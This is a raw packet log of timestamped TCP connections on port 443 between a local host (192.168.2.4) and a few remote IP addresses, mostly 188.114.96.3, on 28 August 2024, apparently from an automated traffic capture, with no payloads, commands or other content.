                                                          Aug 28, 2024 00:11:09.751365900 CEST44349822188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.751380920 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.751425982 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.751435041 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.751560926 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.751606941 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.751612902 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.751651049 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.751684904 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.751688957 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.751698971 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.751737118 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.751821995 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.752567053 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.752731085 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.752743959 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.752763033 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.752775908 CEST49823443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.752784014 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.752791882 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.752793074 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.752808094 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.752815962 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.752835035 CEST49823443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.752850056 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.752872944 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.753082037 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.753127098 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.753134012 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.754044056 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.754079103 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.754090071 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.754096985 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.754138947 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.754146099 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.754868984 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.754899025 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.754914999 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.754923105 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.754961014 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.758955002 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.759336948 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.759366989 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.759383917 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.759390116 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.759435892 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.759443045 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.759758949 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.759805918 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.759814024 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.760612965 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.760639906 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.760658026 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.760664940 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.760699987 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.761043072 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.761537075 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.761579990 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.761588097 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.761626959 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.762430906 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.762485027 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.763448954 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.763499975 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.766545057 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.766612053 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.766715050 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.766767025 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.767241955 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.767287016 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.767592907 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.767635107 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.768018007 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.768079042 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.768136978 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.768182993 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.768542051 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.768594980 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.769047976 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.769092083 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.769582033 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.769649982 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.770015955 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.770071030 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.776339054 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.776365995 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.776392937 CEST49823443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.776402950 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.776443958 CEST49823443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.776515007 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.776923895 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.776978016 CEST49823443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.776988983 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.777605057 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.777628899 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.777652025 CEST49823443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.777657986 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.777679920 CEST49823443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.777689934 CEST49823443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.778364897 CEST44349822188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.778418064 CEST49822443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.778428078 CEST44349822188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.778513908 CEST44349822188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.778558016 CEST49822443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.778685093 CEST49822443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.778695107 CEST44349822188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.778728008 CEST49822443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.778745890 CEST49822443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.779397964 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.779443026 CEST49823443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.779457092 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.779546022 CEST49823443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.781200886 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.781250954 CEST49823443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.781589985 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.781635046 CEST49823443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.781987906 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.782035112 CEST49823443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.782397032 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.782448053 CEST49823443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.782512903 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.782557964 CEST49823443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.782620907 CEST49827443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.783343077 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.783387899 CEST49823443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.783397913 CEST49823443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.783413887 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.783456087 CEST49823443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.783461094 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.783477068 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.783507109 CEST49823443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.783720016 CEST49823443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.783726931 CEST44349823188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.788497925 CEST44349829188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.795593977 CEST49829443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.795593977 CEST49828443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.808238029 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.808298111 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.808374882 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.808410883 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.808422089 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.808429003 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.808446884 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.808461905 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.808468103 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.808509111 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.808548927 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.809026957 CEST49824443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.809037924 CEST44349824188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.829042912 CEST49830443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.829063892 CEST44349830188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:09.829118967 CEST49830443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.829670906 CEST49830443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:09.829682112 CEST44349830188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.181597948 CEST44349829188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.181737900 CEST44349829188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.181883097 CEST49829443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.182518959 CEST49829443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.182531118 CEST44349829188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.184102058 CEST49832443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.184138060 CEST44349832188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.184279919 CEST49832443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.184832096 CEST49833443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.184849024 CEST44349833188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.184957027 CEST49833443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.185497046 CEST49833443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.185497999 CEST49832443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.185507059 CEST44349833188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.185509920 CEST44349832188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.189990997 CEST49834443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.189999104 CEST44349834188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.190577984 CEST49834443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.193970919 CEST49834443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.193983078 CEST44349834188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.265127897 CEST44349827188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.265167952 CEST44349827188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.265249968 CEST44349827188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.265278101 CEST49827443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.265629053 CEST49827443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.269087076 CEST49827443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.269088030 CEST49835443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.269098997 CEST44349827188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.269118071 CEST44349835188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.269596100 CEST49836443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.269622087 CEST44349836188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.269668102 CEST49835443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.269745111 CEST49836443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.270164967 CEST49837443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.270172119 CEST44349837188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.270447016 CEST49837443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.270683050 CEST49835443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.270694971 CEST44349835188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.271049023 CEST49836443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.271055937 CEST44349836188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.271188021 CEST49837443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.271200895 CEST44349837188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.272535086 CEST49838443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.272542000 CEST44349838188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.272665024 CEST49838443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.272870064 CEST49838443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.272880077 CEST44349838188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.290942907 CEST44349830188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.291193962 CEST49830443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.291202068 CEST44349830188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.292190075 CEST44349830188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.292392015 CEST49830443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.292562962 CEST49830443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.292562962 CEST49830443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.292629957 CEST44349830188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.292678118 CEST49830443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.292800903 CEST49839443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.292814970 CEST44349839188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.292819977 CEST44349830188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.292840958 CEST49830443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.292886019 CEST49830443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.292886019 CEST49839443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.293060064 CEST49839443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.293065071 CEST44349839188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.411922932 CEST44349828188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.411978960 CEST44349828188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.412022114 CEST44349828188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.412225962 CEST49828443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.413949966 CEST49828443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.413960934 CEST44349828188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.414865017 CEST49840443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.414882898 CEST44349840188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.415646076 CEST49841443192.168.2.413.33.187.68
                                                          Aug 28, 2024 00:11:10.415666103 CEST4434984113.33.187.68192.168.2.4
                                                          Aug 28, 2024 00:11:10.415695906 CEST49840443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.415767908 CEST49841443192.168.2.413.33.187.68
                                                          Aug 28, 2024 00:11:10.416788101 CEST49840443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.416796923 CEST44349840188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.417011976 CEST49841443192.168.2.413.33.187.68
                                                          Aug 28, 2024 00:11:10.417022943 CEST4434984113.33.187.68192.168.2.4
                                                          Aug 28, 2024 00:11:10.417686939 CEST49842443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.417695045 CEST44349842188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.417954922 CEST49842443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.418203115 CEST49842443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.418211937 CEST44349842188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.633058071 CEST49844443192.168.2.4172.67.70.233
                                                          Aug 28, 2024 00:11:10.633104086 CEST44349844172.67.70.233192.168.2.4
                                                          Aug 28, 2024 00:11:10.633176088 CEST49844443192.168.2.4172.67.70.233
                                                          Aug 28, 2024 00:11:10.633997917 CEST49844443192.168.2.4172.67.70.233
                                                          Aug 28, 2024 00:11:10.634017944 CEST44349844172.67.70.233192.168.2.4
                                                          Aug 28, 2024 00:11:10.643862009 CEST44349832188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.645173073 CEST49832443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.645186901 CEST44349832188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.646192074 CEST44349832188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.646487951 CEST49832443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.646579027 CEST49832443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.646579027 CEST49832443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.646648884 CEST44349832188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.646800041 CEST44349832188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.646826029 CEST49832443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.646826029 CEST49832443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.646838903 CEST44349832188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.646893978 CEST49832443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.647006035 CEST49832443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.647010088 CEST49845443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.647046089 CEST44349845188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.647279024 CEST49845443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.647660971 CEST49845443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.647675037 CEST44349845188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.648796082 CEST44349834188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.658379078 CEST44349833188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.658395052 CEST49834443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.658423901 CEST44349834188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.658921003 CEST49833443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.658929110 CEST44349833188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.659491062 CEST44349834188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.659692049 CEST49834443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.659957886 CEST44349833188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.660013914 CEST49833443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.660525084 CEST49834443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.660525084 CEST49834443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.660598040 CEST44349834188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.660677910 CEST49834443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.660677910 CEST49834443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.660686970 CEST44349834188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.660959959 CEST49846443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.660969019 CEST44349846188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.661004066 CEST49834443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.661120892 CEST49846443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.661550999 CEST49833443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.661590099 CEST49833443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.661590099 CEST49833443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.661617041 CEST44349833188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.661772013 CEST44349833188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.661801100 CEST49847443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.661822081 CEST44349847188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.661834955 CEST49833443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.661834955 CEST49833443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.661940098 CEST49847443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.662193060 CEST49846443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.662203074 CEST44349846188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.666099072 CEST49847443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.666110039 CEST44349847188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.735317945 CEST44349837188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.735318899 CEST44349836188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.735704899 CEST49837443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.735719919 CEST44349837188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.736766100 CEST44349837188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.736804962 CEST49836443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.736814022 CEST44349836188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.736861944 CEST49837443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.737360001 CEST49837443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.737423897 CEST49837443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.737423897 CEST49837443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.737588882 CEST44349837188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.737739086 CEST44349837188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.737765074 CEST49848443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.737795115 CEST44349848188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.737802982 CEST44349836188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.737807035 CEST49837443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.737807035 CEST49837443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.737865925 CEST49836443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.737867117 CEST49848443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.738279104 CEST49848443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.738291025 CEST44349848188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.739228964 CEST49836443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.739228964 CEST49836443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.739288092 CEST44349836188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.739389896 CEST49836443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.739432096 CEST44349836188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.739460945 CEST49836443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.739572048 CEST49836443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.739758968 CEST49849443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.739768982 CEST44349849188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.739850998 CEST49849443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.742109060 CEST49849443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:11:10.742119074 CEST44349849188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.744003057 CEST44349835188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:11:10.744566917 CEST49835443192.168.2.4188.114.96.3
